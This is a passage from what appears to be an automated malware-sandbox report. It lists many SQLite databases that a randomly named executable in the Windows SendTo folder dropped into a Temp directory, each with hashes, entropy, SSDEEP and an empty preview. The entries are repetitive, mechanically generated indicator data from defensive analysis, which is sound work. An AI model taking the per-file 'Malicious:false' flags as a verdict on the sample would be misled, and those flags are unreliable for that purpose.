                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\2tIeFhdno9

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\30tvGaoYbe

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\3BrY52VOgF

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\41D8Sq4Amo

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\43HCJuUXDx

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\4bpdesGH7p

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):49152
                                          Entropy (8bit):0.8180424350137764
                                          Encrypted:false
                                          SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                          MD5:349E6EB110E34A08924D92F6B334801D
                                          SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                          SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                          SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\4df8Xp7utv

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\4oOmq81jru

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\51d9kY6yY6

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\5DcaR7Ru1G

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\5HPApWpicU

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\5TAeaj1clT

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\6Dsy5B85n7

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\79aAKZFO61

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5712781801655107
                                          Encrypted:false
                                          SSDEEP:12:TLVNFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TL1F1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:05A60B4620923FD5D53B9204391452AF
                                          SHA1:DC12F90925033F25C70A720E01D5F8666D0B46E4
                                          SHA-256:6F1CA729609806AF88218D0A35C3B9E34252900341A0E15D71F7F9199E422E13
                                          SHA-512:068A954C0C7A68E603D72032A447E7652B1E9CED5522562FBCBD9EC0A5D2D943701100049FA0A750E71C4D3D84210B48D10855E7CC60919E04ED884983D3C3D6
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7HPrQ3iRpB

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7PtGgc6RRg

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7VDa8lsiN6

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7py4mXZjTG

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                          Category:dropped
                                          Size (bytes):40960
                                          Entropy (8bit):0.8553638852307782
                                          Encrypted:false
                                          SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                          MD5:28222628A3465C5F0D4B28F70F97F482
                                          SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                          SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                          SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7vuIT5bgne

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\7wWIzRsK7C

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                          Category:dropped
                                          Size (bytes):114688
                                          Entropy (8bit):0.9746603542602881
                                          Encrypted:false
                                          SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                          MD5:780853CDDEAEE8DE70F28A4B255A600B
                                          SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                          SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                          SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8H4fVtAaRg

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
                                          SHA-512:29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
                                          Malicious:false
                                          Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8IRDu4lN0g

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):106496
                                          Entropy (8bit):1.1358696453229276
                                          Encrypted:false
                                          SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                          MD5:28591AA4E12D1C4FC761BE7C0A468622
                                          SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                          SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                          SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                          Malicious:false
                                          Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8X6A35axqb

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3039003, file counter 3, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 3
                                          Category:dropped
                                          Size (bytes):20480
                                          Entropy (8bit):0.5707520969659783
                                          Encrypted:false
                                          SSDEEP:12:TLVlFVP89GkwtwhuFdbXGwvfhowcFOaOmzdOtssh+bgc4Jp+FxOUwa5q0S9zXhZn:TLxF1kwNbXYFpFNYcw+6UwcQVXH5fB
                                          MD5:9F6D153D934BCC50E8BC57E7014B201A
                                          SHA1:50B3F813A1A8186DE3F6E9791EC41D95A8DC205D
                                          SHA-256:2A7FC7F64938AD07F7249EC0BED6F48BC5302EA84FE9E61E276436EA942BA230
                                          SHA-512:B8CA2DCB8D62A0B2ED8795C3F67E4698F3BCB208C26FBD8BA9FD4DA82269E6DE9C5759F27F28DC108677DDEBBAC96D60C4ED2E64C90D51DB5B0F70331185B33F
                                          Malicious:false
                                          Preview:SQLite format 3......@ .........................................................................._..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                          C:\Users\user\AppData\Local\Temp\8Yn56qoNyl

                                          Download File
                                          Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\SendTo\MaEiPrsQRasQLtRzJjb.exe
                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
                                          Category:dropped
                                          Size (bytes):28672
                                          Entropy (8bit):2.5793180405395284
                                          Encrypted:false
                                          SSDEEP:96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
                                          MD5:41EA9A4112F057AE6BA17E2838AEAC26
                                          SHA1:F2B389103BFD1A1A050C4857A995B09FEAFE8903
                                          SHA-256:CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
